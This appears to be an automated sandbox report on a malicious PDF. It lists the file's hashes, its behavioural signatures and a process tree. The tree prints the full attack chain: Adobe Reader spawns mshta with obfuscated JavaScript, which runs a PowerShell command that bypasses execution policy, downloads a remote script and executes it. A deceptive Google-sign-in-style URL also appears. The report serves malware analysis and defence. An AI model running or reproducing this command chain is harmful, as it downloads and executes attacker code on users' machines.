Analysis

  • max time kernel
    117s
  • max time network
    142s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64, arch:x86, image:win7-20231215-en, locale:en-us, os:windows7-x64, system
  • submitted
    07-02-2024 15:19

General

  • Target

    a2e7f3210ef4f7fb06606399dd09b873715abc2ce4a45900bd2434f37d55c559.pdf

  • Size

    50KB

  • MD5

    feac523f300947e52e2e5ca44221d9d9

  • SHA1

    ac6dc611f760b48779bded9a5e6816c91375fd2a

  • SHA256

    a2e7f3210ef4f7fb06606399dd09b873715abc2ce4a45900bd2434f37d55c559

  • SHA512

    53cd297d814b2e4b99926502c49a95128c1e4ed564476c8c67f19bb0d5423889a4be60384975a2d35545fdfaf21785dc2d0c9e7828a5dfac4ed988eab11ff332

  • SSDEEP

    384:86SDvX7hWFcTPm/K7Uzzzzzzzzzzzzzzzzz3SkYTZvL:86ST7hWGTO/KQ8ZvL

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices (1 TTP)

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings (1 TTP, 29 IoCs)
  • Suspicious behavior: EnumeratesProcesses (1 IoC)
  • Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  • Suspicious use of AdjustPrivilegeToken (1 IoC)
  • Suspicious use of FindShellTrayWindow (1 IoC)
  • Suspicious use of SetWindowsHookEx (9 IoCs)
  • Suspicious use of WriteProcessMemory (16 IoCs)

Processes

  • C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
    "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\a2e7f3210ef4f7fb06606399dd09b873715abc2ce4a45900bd2434f37d55c559.pdf"
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2220
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\System32\mshta.exe" "javascript:_r°0=['Scripting.FileSystemObject','WScript.Shell','powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm htlfeb24.blogspot.com//////////////////////////////atom.xml | iex);Start-Sleep -Seconds 5;','run']; x°x=[_r°0[3],_r°0[0],_r°0[1],_r°0[2]]; new ActiveXObject(x°x[2])[x°x[0]](x°x[3], 0, true);close();new ActiveXObject(x°x[1]).DeleteFile(WScript.ScriptFullName);"
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:2380
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm htlfeb24.blogspot.com//////////////////////////////atom.xml | iex);Start-Sleep -Seconds 5;
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2832
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" https://accounts.google.com+signin%3Dsecure+v2+identifier%[email protected]////////atom.xml?http://www.booking.com
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2704
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2704 CREDAT:275457 /prefetch:2
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:2952

Network

MITRE ATT&CK Enterprise v15

Downloads
